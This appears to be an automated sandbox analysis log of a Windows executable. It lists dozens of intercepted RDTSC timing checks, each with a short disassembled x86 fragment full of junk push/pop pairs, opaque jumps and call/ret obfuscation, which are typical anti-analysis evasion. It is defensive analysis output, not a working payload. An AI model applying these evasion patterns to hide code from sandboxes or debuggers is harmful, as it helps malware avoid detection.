                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299248 second address: 1299271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4207h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299271 second address: 1299275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299275 second address: 127F099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F849CDA41F8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov ecx, edx 0x00000024 call dword ptr [ebp+122D38C4h] 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299916 second address: 1299942 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F849C4F2D9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F849C4F2DA8h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299942 second address: 1299957 instructions: 0x00000000 rdtsc 0x00000002 je 00007F849CDA41F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299957 second address: 1299985 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jns 00007F849C4F2D96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 je 00007F849C4F2D9Ch 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 jp 00007F849C4F2DA2h 0x00000026 jbe 00007F849C4F2D9Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299BD6 second address: 1299BE0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F849CDA41FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299C93 second address: 1299C98 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299C98 second address: 1299CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jo 00007F849CDA41F6h 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A4F9 second address: 129A515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx edx, di 0x0000000c lea eax, dword ptr [ebp+1247AF19h] 0x00000012 sbb dh, 0000001Ah 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 push esi 0x0000001a pop esi 0x0000001b pop ebx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A515 second address: 129A51F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F849CDA41FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A51F second address: 129A548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnc 00007F849C4F2D9Ch 0x0000000e jng 00007F849C4F2D96h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F849C4F2DA3h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A548 second address: 129A58C instructions: 0x00000000 rdtsc 0x00000002 js 00007F849CDA41F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c xor dword ptr [ebp+122D2EC6h], esi 0x00000012 lea eax, dword ptr [ebp+1247AED5h] 0x00000018 jmp 00007F849CDA4201h 0x0000001d nop 0x0000001e jg 00007F849CDA41FCh 0x00000024 push eax 0x00000025 pushad 0x00000026 jne 00007F849CDA41F8h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A58C second address: 129A590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD986 second address: 12CD98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDAF4 second address: 12CDB06 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F849C4F2D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F849C4F2D9Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDB06 second address: 12CDB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDB0C second address: 12CDB33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2D9Bh 0x00000007 pushad 0x00000008 jc 00007F849C4F2D96h 0x0000000e jmp 00007F849C4F2D9Fh 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDB33 second address: 12CDB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F849CDA41FBh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDB47 second address: 12CDB4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5294 second address: 12D5299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5299 second address: 12D529F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D529F second address: 12D52B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA41FEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D587F second address: 12D5884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5884 second address: 12D58B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4200h 0x00000007 jmp 00007F849CDA4202h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D58B0 second address: 12D58BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D58BB second address: 12D58D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F849CDA41FEh 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F849CDA41F6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5A2A second address: 12D5A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5A2E second address: 12D5A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F849CDA4204h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5EB3 second address: 12D5EE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2D9Ch 0x00000007 jmp 00007F849C4F2DA8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5EE1 second address: 12D5EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007F849CDA41FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D6021 second address: 12D605B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnc 00007F849C4F2D96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ebx 0x0000000e jmp 00007F849C4F2DA5h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F849C4F2DA3h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D62D1 second address: 12D62FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4207h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d jo 00007F849CDA41FEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFBA6 second address: 12DFBAC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFE5E second address: 12DFE8D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F849CDA41F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F849CDA4202h 0x00000012 jmp 00007F849CDA41FEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFE8D second address: 12DFE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFE92 second address: 12DFEC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F849CDA4207h 0x00000009 jmp 00007F849CDA4209h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFEC6 second address: 12DFEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F849C4F2DA4h 0x00000014 je 00007F849C4F2D96h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFEFE second address: 12DFF0C instructions: 0x00000000 rdtsc 0x00000002 js 00007F849CDA41F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFF0C second address: 12DFF10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFF10 second address: 12DFF14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFF14 second address: 12DFF1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFF1A second address: 12DFF20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFF20 second address: 12DFF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F849C4F2D96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E00AE second address: 12E00B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0380 second address: 12E0384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0384 second address: 12E03A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA4206h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E03A0 second address: 12E03B0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F849C4F2DA2h 0x00000008 jbe 00007F849C4F2D96h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E03B0 second address: 12E03C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F849CDA41FBh 0x0000000b jo 00007F849CDA41F6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0519 second address: 12E051D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E051D second address: 12E0527 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0527 second address: 12E052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E052B second address: 12E052F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E084D second address: 12E0857 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F849C4F2D9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0857 second address: 12E087B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F849CDA4204h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0DEA second address: 12E0E09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2D9Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F849C4F2D9Eh 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3F4F second address: 12E3F53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3F53 second address: 12E3F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E4081 second address: 12E4085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E4085 second address: 12E408B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E408B second address: 12E4091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6466 second address: 12E647F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2D9Ch 0x00000007 ja 00007F849C4F2D96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB5D5 second address: 12EB5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F849CDA41F6h 0x0000000a popad 0x0000000b jmp 00007F849CDA4203h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA898 second address: 12EA8B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F849C4F2DA0h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA8B1 second address: 12EA8B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA8B7 second address: 12EA8BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA8BB second address: 12EA8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAA66 second address: 12EAA80 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F849C4F2DA3h 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EABEB second address: 12EABF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EABF1 second address: 12EAC1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F849C4F2D98h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAC1D second address: 12EAC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA41FCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAFE7 second address: 12EAFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAFEB second address: 12EAFEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAFEF second address: 12EAFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F849C4F2D9Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB188 second address: 12EB199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jng 00007F849CDA41F6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB199 second address: 12EB19F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB19F second address: 12EB1B6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F849CDA41F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jc 00007F849CDA41F6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EE185 second address: 12EE18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EE18B second address: 12EE198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F849CDA41F6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F4E23 second address: 12F4E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F849C4F2DA7h 0x0000000a jmp 00007F849C4F2DA4h 0x0000000f popad 0x00000010 jl 00007F849C4F2DA2h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F37E8 second address: 12F37F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA41FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F37F6 second address: 12F37FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F37FB second address: 12F380A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 jc 00007F849CDA41FCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F380A second address: 12F3830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F849C4F2DA6h 0x0000000d jl 00007F849C4F2D98h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3830 second address: 12F3837 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3965 second address: 12F397E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F849C4F2D9Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299F2F second address: 1299F3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299F3D second address: 1299F41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299F41 second address: 1299F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299F47 second address: 1299FE9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F849C4F2DA1h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b adc dx, F44Dh 0x00000010 mov ebx, dword ptr [ebp+1247AF14h] 0x00000016 add edx, dword ptr [ebp+122D1980h] 0x0000001c add eax, ebx 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F849C4F2D98h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 add cl, 00000001h 0x0000003b push eax 0x0000003c jns 00007F849C4F2DACh 0x00000042 mov dword ptr [esp], eax 0x00000045 push 00000000h 0x00000047 push eax 0x00000048 call 00007F849C4F2D98h 0x0000004d pop eax 0x0000004e mov dword ptr [esp+04h], eax 0x00000052 add dword ptr [esp+04h], 00000018h 0x0000005a inc eax 0x0000005b push eax 0x0000005c ret 0x0000005d pop eax 0x0000005e ret 0x0000005f mov dword ptr [ebp+122D26DDh], esi 0x00000065 push 00000004h 0x00000067 mov edx, dword ptr [ebp+122D19FEh] 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 